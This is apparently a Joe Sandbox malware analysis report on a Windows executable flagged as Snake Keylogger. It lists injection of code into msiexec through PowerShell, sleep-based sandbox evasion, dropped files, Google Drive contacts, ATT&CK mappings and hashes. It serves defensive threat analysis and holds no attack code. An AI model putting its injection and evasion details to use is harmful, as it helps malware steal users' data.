Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7988			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1686			Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll			Jump to dropped file
Source: C:\Users\user\Desktop\beNxougDFV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7256	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: msiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\beNxougDFV.exe	API call chain: ExitProcess graph end node			graph_0-3539
Source: C:\Users\user\Desktop\beNxougDFV.exe	API call chain: ExitProcess graph end node			graph_0-3541

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe

0_2_004031BB

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
beNxougDFV.exe	50%	ReversingLabs	Win32.Spyware.Snakekeylogger
beNxougDFV.exe	100%	Avira	TR/AVI.Agent.ennqy

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe	100%	Avira	TR/AVI.Agent.ennqy
C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe	50%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label	Link
https://translate.googl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.1	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/)rLS	msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2294517511.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	beNxougDFV.exe, beNxougDFV.exe.2.dr	false		high
https://drive.google.com/cq	msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://translate.googl	msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/c	msiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/s	msiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	beNxougDFV.exe, beNxougDFV.exe.2.dr	false		high
https://drive.google.com/#pMR=	msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/s	msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/ificate	msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.1	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
172.217.19.174	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567517
Start date and time:	2024-12-03 16:39:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	beNxougDFV.exe renamed because original name is a hash value
Original Sample Name:	3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/14@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 24
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
VT rate limit hit for: beNxougDFV.exe

Simulations

Behavior and APIs

Time	Type	Description
10:40:45	API Interceptor	39x Sleep call for process: powershell.exe modified
10:42:18	API Interceptor	6x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0035.t-0009.t-msedge.net	4z0JKnfc8L.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	MOaSkQR8WU.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.63
	Ksl3V3pqZq.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	pbenHWj8JO.exe	Get hash	malicious	ScreenConnect Tool	Browse	13.107.246.63
	lCwus2wfk6.exe	Get hash	malicious	ScreenConnect Tool	Browse	13.107.246.63
	VVs9SAqm5N.exe	Get hash	malicious	ScreenConnect Tool	Browse	13.107.246.63
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.63
	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	13.107.246.63
	RFQ 9-XTC-204-60THD.xlsx.exe	Get hash	malicious	Quasar	Browse	13.107.246.63

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.1 172.217.19.174
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.181.1 172.217.19.174
	Request for Quote and Collaboration Docs.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.1 172.217.19.174
	REQUEST FOR QUOATION AND PRICES.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.1 172.217.19.174
	IBAN payment confirmation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.1 172.217.19.174
	yMvZXcwN2OdoP6x.exe	Get hash	malicious	DarkCloud	Browse	142.250.181.1 172.217.19.174
	Curri.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	36244920cQPUT1.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	1099833039444.pdf.js	Get hash	malicious	Remcos	Browse	142.250.181.1 172.217.19.174
	kelscrit.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.181.1 172.217.19.174

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5zre3fi.bh5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3gfk5d3.0e2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
